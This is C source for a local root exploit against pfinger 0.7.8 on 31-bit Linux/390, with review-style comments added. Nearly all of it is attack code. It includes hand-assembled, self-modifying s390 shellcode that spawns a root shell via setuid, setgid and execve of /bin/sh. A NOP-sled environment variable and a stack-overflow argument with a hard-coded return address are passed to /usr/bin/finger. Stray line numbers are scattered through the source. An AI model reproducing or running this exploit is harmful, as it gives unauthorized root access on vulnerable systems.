// Linux/390 (31-bit) local exploit for pfinger 0.7.8 and earlier
2 // 390 sploit by jcyberpunk@thehackerschoice.com
3 // diz is just a lame proof of concept sploit
4 // to show how easy 390linux exploitation is
5
#define _DEFAULT_SOURCE         /* putenv() prototype in <stdlib.h> under -std=c11 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
8
/*
 * Self-modifying s390 (31-bit) payload, delivered to the target inside the
 * "evil=" environment variable that main() builds below.
 *
 * %r1 is set by the leading BASSM to the address of the instruction that
 * follows it (array offset 2), so an operand N(%r1) refers to array
 * offset N+2.  The fixed positions the code relies on:
 *   offset 74..75  the "\x0b\x17" placeholder that is patched in place
 *                  before each BASR %r14,%r9 call; per the annotation on
 *                  those bytes it executes as an SVC once patched
 *   offset 78..85  the string "/bin/sh\" -- the trailing backslash is
 *                  replaced by a 0 byte at run time (STC %r4,83(%r1))
 *   offset 86..93  argv[0] / argv[1] pointer slots written at run time;
 *                  these lie past the end of this 87-byte array, i.e. on
 *                  whatever follows the env string in the target's stack
 *
 * The three call numbers are produced arithmetically (1110-1100 = 10,
 * 1146-1100 = 46, 1111-1100 = 11) rather than stored literally,
 * presumably to keep 0x0a ('\n') out of the raw bytes -- TODO confirm.
 * The first patch writes 10 over the opcode byte (offset 74), leaving the
 * operand byte 0x17 = 23; the next two patches write 46 and then 11 over
 * the operand byte (offset 75).  With %r2 = 0 for the first two calls and
 * %r2 = "/bin/sh", %r3 = argv, %r4 = envp for the third, this reads as
 * setuid(0); setgid(0); execve("/bin/sh", argv, envp) -- verify the
 * numbers against the s390 Linux system-call table before relying on it.
 *
 * No byte of the payload is 0x00, so it survives putenv() as a C string.
 */
char shellcode[]=
"\x0c\x10"              /* bassm        %r1,%r0      ; %r1 = &shellcode[2] */
"\x41\x90\x10\x48"      /* la           %r9,72(%r1)  ; %r9 = &placeholder (offset 74) */
"\xa7\xa8\xfb\xb4"      /* lhi          %r10,-1100   ; constant bias, see header */
"\xa7\x68\x04\x56"      /* lhi          %r6,1110                */
"\x1a\x6a"              /* ar           %r6,%r10     ; %r6 = 10 */
"\x42\x60\x10\x48"      /* stc          %r6,72(%r1)  ; patch opcode byte at offset 74 */
"\x17\x22"              /* xr           %r2,%r2      ; first argument = 0 */
"\x0d\xe9"              /* basr         %r14,%r9     ; call patched SVC (operand byte still 23) */
"\xa7\x68\x04\x7a"      /* lhi          %r6,1146                */
"\x1a\x6a"              /* ar           %r6,%r10     ; %r6 = 46 */
"\x42\x60\x10\x49"      /* stc          %r6,73(%r1)  ; patch operand byte at offset 75 */
"\x0d\xe9"              /* basr         %r14,%r9     ; call SVC 46, %r2 still 0 */
"\xa7\x68\x04\x57"      /* lhi          %r6,1111                */
"\x1a\x6a"              /* ar           %r6,%r10     ; %r6 = 11 */
"\x42\x60\x10\x49"      /* stc          %r6,73(%r1)  ; patch operand byte at offset 75 */
"\x41\x20\x10\x4c"      /* la           %r2,76(%r1)  ; %r2 = "/bin/sh" (offset 78) */
"\x50\x20\x10\x54"      /* st           %r2,84(%r1)  ; argv[0] slot at offset 86 */
"\x41\x30\x10\x54"      /* la           %r3,84(%r1)  ; %r3 = argv */
"\x17\x44"              /* xr           %r4,%r4      ; %r4 = 0 (same bytes as the NOP sled) */
"\x42\x40\x10\x53"      /* stc          %r4,83(%r1)  ; NUL-terminate "/bin/sh" (offset 85) */
"\x50\x40\x10\x58"      /* st           %r4,88(%r1)  ; argv[1] = NULL at offset 90 */
"\x41\x40\x10\x58"      /* la           %r4,88(%r1)  ; %r4 = envp = &argv[1] (empty env) */
"\x0d\xe9"              /* basr         %r14,%r9     ; call SVC 11 */
"\x0b\x17"              /* svc n after self-modification (placeholder, offset 74) */
"\x07\xfe"              /* br           %r14         ; return to the caller of %r9 */
"\x2f\x62"              /* /b                                   */
"\x69\x6e\x2f\x73"      /* in/s                                 */
"\x68\x5c";             /* h\   ; backslash is zeroed at run time */
38
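/*
 * Build the overlong argument and the payload-carrying environment
 * variable, then exec the target binary.
 *
 * buf: 160 filler bytes followed by the 4-byte return address 0x7fffff92,
 *      NUL-terminated by the zeroed remainder of the array.  Both the
 *      160-byte offset and the address are hard-coded for one particular
 *      build and stack layout; they are the first thing to re-derive when
 *      the overflow lands elsewhere.
 * sc:  "evil=" + NOP sled (xr %r4,%r4 pairs) + shellcode, handed to
 *      putenv() so the exec'd process inherits it on its stack.
 *
 * Does not return on success (execl() replaces the process); returns 1
 * if putenv() or execl() fails.
 */
int main(void)
{
    unsigned char buf[256];
    unsigned char sc[256];
    static const unsigned char nop[] = "\x17\x44";   /* xr %r4,%r4 */
    size_t sclen = strlen(shellcode);
    uint32_t ret = 0x7fffff92;
    size_t i;

    /* Zero both arrays up front.  The original left sc[101..255]
     * uninitialized, so the env string's length -- and with it the
     * shellcode's stack address in the target -- varied with whatever
     * garbage happened to follow the sled. */
    memset(buf, 0, sizeof buf);
    memset(sc, 0, sizeof sc);

    memset(buf, 'x', 160);
    /* memcpy rather than a type-punned store: same 4 bytes in native
     * (big-endian on s390) order, no alignment/aliasing UB, and the width
     * stays 4 even if this is ever built where long is 8 bytes. */
    memcpy(buf + 160, &ret, sizeof ret);

    /* Sled occupies sc[0..100]; the payload is placed so it ends at sc[99]. */
    for (i = 0; i <= 100; i++)
        sc[i] = nop[i % 2];
    if (sclen > 100) {
        fprintf(stderr, "shellcode too long (%zu bytes)\n", sclen);
        return 1;
    }
    memcpy(&sc[100 - sclen], shellcode, sclen);
    /* The variable name overwrites the first five sled bytes. */
    memcpy(sc, "evil=", 5);

    /* NOTE(review): the payload stores its argv/envp pointers at offsets
     * 86..93 from its own start, i.e. sc[100..107] here; after the NUL at
     * sc[101] those bytes are not part of the env string, so in the
     * target they land on whatever follows it on the stack. */
    if (putenv((char *)sc) != 0) {
        perror("putenv");
        return 1;
    }

    execl("/usr/bin/finger", "finger", (char *)buf, (char *)NULL);
    perror("execl");
    return 1;
}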